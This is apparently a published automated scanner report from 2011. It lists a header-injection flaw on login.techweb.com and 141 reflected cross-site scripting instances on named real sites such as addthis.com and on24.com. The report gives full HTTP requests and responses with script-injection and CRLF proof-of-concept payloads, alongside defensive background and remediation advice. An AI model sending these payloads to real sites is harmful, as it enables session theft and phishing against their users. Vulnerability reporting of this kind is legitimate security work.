Reflected XSS, GHDB, DORK, Inept, Fools, CWE-79, CAPEC-86, Vulnerable Web Sites

The value of the service request parameter is copied into the Location response header. The payload a22a6%0d%0a2bc471bdc92 was submitted in the service parameter. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /cas/login?service=a22a6%0d%0a2bc471bdc92&gateway=true HTTP/1.1
Host: login.techweb.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 23 Apr 2011 03:03:15 GMT
Server: Apache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Location: https://login.techweb.com/cas/a22a6
2bc471bdc92
Content-Language: en-US
Content-Length: 0
Keep-Alive: timeout=10, max=500
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

2. Cross-site scripting (reflected) previous next
There are 141 instances of this issue:

http://api-public.addthis.com/url/shares.json [callback parameter]
http://ds.addthis.com/red/psi/sites/www.addthis.com/p.json [callback parameter]
http://ds.addthis.com/red/psi/sites/www.freethewan.com/p.json [callback parameter]
http://ds.addthis.com/red/psi/sites/www.limitedbrands.com/p.json [callback parameter]
http://event.on24.com/eventRegistration/eventRegistrationServlet [name of an arbitrarily supplied request parameter]
http://event.on24.com/eventRegistration/eventRegistrationServlet [name of an arbitrarily supplied request parameter]
http://event.on24.com/eventRegistration/eventRegistrationServlet [partnerref parameter]
http://event.on24.com/eventRegistration/eventRegistrationServlet [partnerref parameter]
http://ipv6-test.com/validate.php [name of an arbitrarily supplied request parameter]
http://ipv6-test.com/validate.php [url parameter]
http://limitied.com/fullpop.php [name of an arbitrarily supplied request parameter]
http://limitied.com/fullpop.php [rurl parameter]
http://limitied.com/search.php [uid parameter]
http://limitied.com/tg.php [uid parameter]
http://limitied.com/tg.php [uid parameter]
http://pixel.fetchback.com/serve/fb/pdc [name parameter]
http://postboard.com/lander.php [domain parameter]
http://postboard.com/lander.php [target parameter]
http://www.addthis.com/analytics [REST URL parameter 1]
http://www.addthis.com/analytics [REST URL parameter 1]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 1]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 1]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 2]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 3]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 3]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 4]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 4]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 5]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 5]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 6]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 6]
http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [name of an arbitrarily supplied request parameter]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
http://www.addthis.com/bookmark.php [v parameter]
http://www.addthis.com/favicon.ico [REST URL parameter 1]
http://www.addthis.com/favicon.ico [REST URL parameter 1]
http://www.addthis.com/forum/style.php [REST URL parameter 1]
http://www.addthis.com/forum/style.php [REST URL parameter 1]
http://www.addthis.com/forum/style.php [REST URL parameter 2]
http://www.addthis.com/forum/style.php [REST URL parameter 2]
http://www.addthis.com/get-addthis [REST URL parameter 1]
http://www.addthis.com/get-addthis [REST URL parameter 1]
http://www.addthis.com/icons/back.gif [REST URL parameter 1]
http://www.addthis.com/icons/back.gif [REST URL parameter 1]
http://www.addthis.com/icons/back.gif [REST URL parameter 2]
http://www.addthis.com/icons/back.gif [REST URL parameter 2]
http://www.addthis.com/icons/back.gif [name of an arbitrarily supplied request parameter]
http://www.addthis.com/icons/blank.gif [REST URL parameter 1]
http://www.addthis.com/icons/blank.gif [REST URL parameter 1]
http://www.addthis.com/icons/blank.gif [REST URL parameter 2]
http://www.addthis.com/icons/blank.gif [REST URL parameter 2]
http://www.addthis.com/icons/blank.gif [name of an arbitrarily supplied request parameter]
http://www.addthis.com/icons/folder.gif [REST URL parameter 1]
http://www.addthis.com/icons/folder.gif [REST URL parameter 1]
http://www.addthis.com/icons/folder.gif [REST URL parameter 2]
http://www.addthis.com/icons/folder.gif [REST URL parameter 2]
http://www.addthis.com/icons/folder.gif [name of an arbitrarily supplied request parameter]
http://www.addthis.com/icons/text.gif [REST URL parameter 1]
http://www.addthis.com/icons/text.gif [REST URL parameter 1]
http://www.addthis.com/icons/text.gif [REST URL parameter 2]
http://www.addthis.com/icons/text.gif [REST URL parameter 2]
http://www.addthis.com/icons/text.gif [name of an arbitrarily supplied request parameter]
http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [name of an arbitrarily supplied request parameter]
http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [name of an arbitrarily supplied request parameter]
http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [name of an arbitrarily supplied request parameter]
http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderMiddleLeft.png [name of an arbitrarily supplied request parameter]
http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderMiddleRight.png [name of an arbitrarily supplied request parameter]
http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderTopCenter.png [name of an arbitrarily supplied request parameter]
http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [name of an arbitrarily supplied request parameter]
http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 1]
http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 2]
http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 3]
http://www.addthis.com/images4/internet_explorer/borderTopRight.png [name of an arbitrarily supplied request parameter]
http://www.addthis.com/services/trends-load/format/json [REST URL parameter 1]
http://www.addthis.com/services/trends-load/format/json [REST URL parameter 1]
http://www.addthis.com/services/trends-load/format/json [REST URL parameter 2]
http://www.addthis.com/services/trends-load/format/json [REST URL parameter 2]
http://www.addthis.com/services/trends-load/format/json [REST URL parameter 3]
http://www.addthis.com/services/trends-load/format/json [REST URL parameter 3]
http://www.addthis.com/services/trends-load/format/json [REST URL parameter 4]
http://www.addthis.com/services/trends-load/format/json [REST URL parameter 4]
http://www.interop.com/lasvegas/conference/keynote-speakers.php [name of an arbitrarily supplied request parameter]
http://www.interop.com/lasvegas/conference/overview.php [name of an arbitrarily supplied request parameter]
http://www.interop.com/lasvegas/it-expo/free-programs.php [name of an arbitrarily supplied request parameter]
http://www.lasenza.com/eng/products/bras/pushup/lace-push-up-bra [115501-062/PMBOBO$10 parameter]
http://www.lasenza.com/eng/products/bras/pushup/lace-push-up-bra [115501-062/PMBOBO$10 parameter]
http://www.lasenza.com/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm [itemId parameter]
http://www.lasenza.com/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm [lang parameter]
http://www.lasenza.com/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm [name of an arbitrarily supplied request parameter]
http://searchportal.information.com/ [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://seg.sharethis.com/getSegment.php [__stid cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://api-public.addthis.com/url/shares.json [callback parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api-public.addthis.com
Path:	/url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 95faf<script>alert(1)</script>a5d5dd58ee0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fipv6-test.com%2Fvalidate.php%3Furl%3Dreferer&callback=_ate.cbs.sc_httpipv6testcomvalidatephpurlreferer95faf<script>alert(1)</script>a5d5dd58ee0 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://ipv6-test.com/validate.php?url=referer
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1303408224.1FE|1303408224.60|1303408224.66; dt=X; uid=4dab4fa85facd099; psc=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Sat, 23 Apr 2011 02:50:32 GMT
Content-Length: 105
Connection: close

_ate.cbs.sc_httpipv6testcomvalidatephpurlreferer95faf<script>alert(1)</script>a5d5dd58ee0({"shares":37});

2.2. http://ds.addthis.com/red/psi/sites/www.addthis.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.addthis.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3bfdc<script>alert(1)</script>610234695df was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.addthis.com/p.json?callback=_ate.ad.hpr3bfdc<script>alert(1)</script>610234695df&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.addthis.com%2F&fxcwvi HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 23 Apr 2011 04:02:29 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 23 May 2011 04:02:29 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 23 Apr 2011 04:02:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 23 Apr 2011 04:02:29 GMT
Connection: close

_ate.ad.hpr3bfdc<script>alert(1)</script>610234695df({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

2.3. http://ds.addthis.com/red/psi/sites/www.freethewan.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.freethewan.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3ad8c<script>alert(1)</script>37e2801b9ef was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.freethewan.com/p.json?callback=_ate.ad.hpr3ad8c<script>alert(1)</script>37e2801b9ef&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.freethewan.com%2F&1d4htzc HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1303408224.1FE|1303408224.60|1303408224.66; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 441
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 23 Apr 2011 03:33:43 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 23 May 2011 03:33:43 GMT; Path=/
Set-Cookie: di=%7B%7D..1303529623.1FE|1303529623.1OD|1303529623.60|1303408224.66; Domain=.addthis.com; Expires=Mon, 22-Apr-2013 02:56:26 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 23 Apr 2011 03:33:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 23 Apr 2011 03:33:43 GMT
Connection: close

_ate.ad.hpr3ad8c<script>alert(1)</script>37e2801b9ef({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099","http://cspix.media6degrees.com/orbser
...[SNIP]...

2.4. http://ds.addthis.com/red/psi/sites/www.limitedbrands.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.limitedbrands.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cde89<script>alert(1)</script>30704d208ea was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.limitedbrands.com/p.json?callback=_ate.ad.hprcde89<script>alert(1)</script>30704d208ea&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.limitedbrands.com%2Four_brands%2Fbath_body_works%2Fcontact.aspx&1yoakam HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 23 Apr 2011 04:39:46 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 23 May 2011 04:39:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 23 Apr 2011 04:39:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 23 Apr 2011 04:39:46 GMT
Connection: close

_ate.ad.hprcde89<script>alert(1)</script>30704d208ea({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

2.5. http://event.on24.com/eventRegistration/eventRegistrationServlet [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.on24.com
Path:	/eventRegistration/eventRegistrationServlet

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a094d--><script>alert(1)</script>a5d31481f96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /eventRegistration/eventRegistrationServlet?eventid=304201&sessionid=1&key=F6F93BDA53DEDC5D3EB1DE681ED7D7A9&partnerref=ilvbannerad&referrer=&a094d--><script>alert(1)</script>a5d31481f96=1 HTTP/1.1
Host: event.on24.com
Proxy-Connection: keep-alive
Referer: http://event.on24.com/r.htm?e=304201&s=1&k=F6F93BDA53DEDC5D3EB1DE681ED7D7A9&partnerref=ilvbannerad
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 02:50:26 GMT
Set-Cookie: JSESSIONID=OyGwon7WdUUaC9Hxg8LzncVglkOQCia09Vmtb6A0LXHFR5QOA6Vi!1592660470; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close

<html><head></head><body onload='redirectIt();'><center><script>alert(1)</script>a5d31481f96=1&sourcepage=register'>
...[SNIP]...

2.6. http://event.on24.com/eventRegistration/eventRegistrationServlet [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.on24.com
Path:	/eventRegistration/eventRegistrationServlet

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d6e0</script><script>alert(1)</script>78a794abcca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /eventRegistration/eventRegistrationServlet?eventid=304201&sessionid=1&key=F6F93BDA53DEDC5D3EB1DE681ED7D7A9&partnerref=ilvbannerad&referrer=&4d6e0</script><script>alert(1)</script>78a794abcca=1 HTTP/1.1
Host: event.on24.com
Proxy-Connection: keep-alive
Referer: http://event.on24.com/r.htm?e=304201&s=1&k=F6F93BDA53DEDC5D3EB1DE681ED7D7A9&partnerref=ilvbannerad
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 02:50:26 GMT
Set-Cookie: JSESSIONID=Pm6yk2t7f59vvlVocM47TeIp8fyMIZaPnYGZfWLqIeHuvunB4jED!1964158128; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close

<html><head></head><body onload='redirectIt();'><center><!--h6>Thank you. Please wait a few seconds while you are redirected (or <a href='https://event.on24.com/eventRegistration/EventLobbyServlet?tar
...[SNIP]...
ectIt() {var lobbyRedirectUrl='https://event.on24.com/eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=304201&sessionid=1&key=F6F93BDA53DEDC5D3EB1DE681ED7D7A9&partnerref=ilvbannerad&4d6e0</script><script>alert(1)</script>78a794abcca=1&sourcepage=register';location.href=lobbyRedirectUrl;}</script>
...[SNIP]...

2.7. http://event.on24.com/eventRegistration/eventRegistrationServlet [partnerref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.on24.com
Path:	/eventRegistration/eventRegistrationServlet

Issue detail

The value of the partnerref request parameter is copied into an HTML comment. The payload 81b42--><script>alert(1)</script>03fffa3d05e was submitted in the partnerref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /eventRegistration/eventRegistrationServlet?eventid=304201&sessionid=1&key=F6F93BDA53DEDC5D3EB1DE681ED7D7A9&partnerref=ilvbannerad81b42--><script>alert(1)</script>03fffa3d05e&referrer= HTTP/1.1
Host: event.on24.com
Proxy-Connection: keep-alive
Referer: http://event.on24.com/r.htm?e=304201&s=1&k=F6F93BDA53DEDC5D3EB1DE681ED7D7A9&partnerref=ilvbannerad
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 02:50:09 GMT
Set-Cookie: JSESSIONID=i9BspfPVz6vtBiUbWu9ZADLFbD4ZcWOlUZrsBEhVC2Q9iVrjvdeO!1268127745; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close

<html><head></head><body onload='redirectIt();'><center><script>alert(1)</script>03fffa3d05e&sourcepage=register'>
...[SNIP]...

2.8. http://event.on24.com/eventRegistration/eventRegistrationServlet [partnerref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.on24.com
Path:	/eventRegistration/eventRegistrationServlet

Issue detail

The value of the partnerref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4681</script><script>alert(1)</script>0bf32b76204 was submitted in the partnerref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

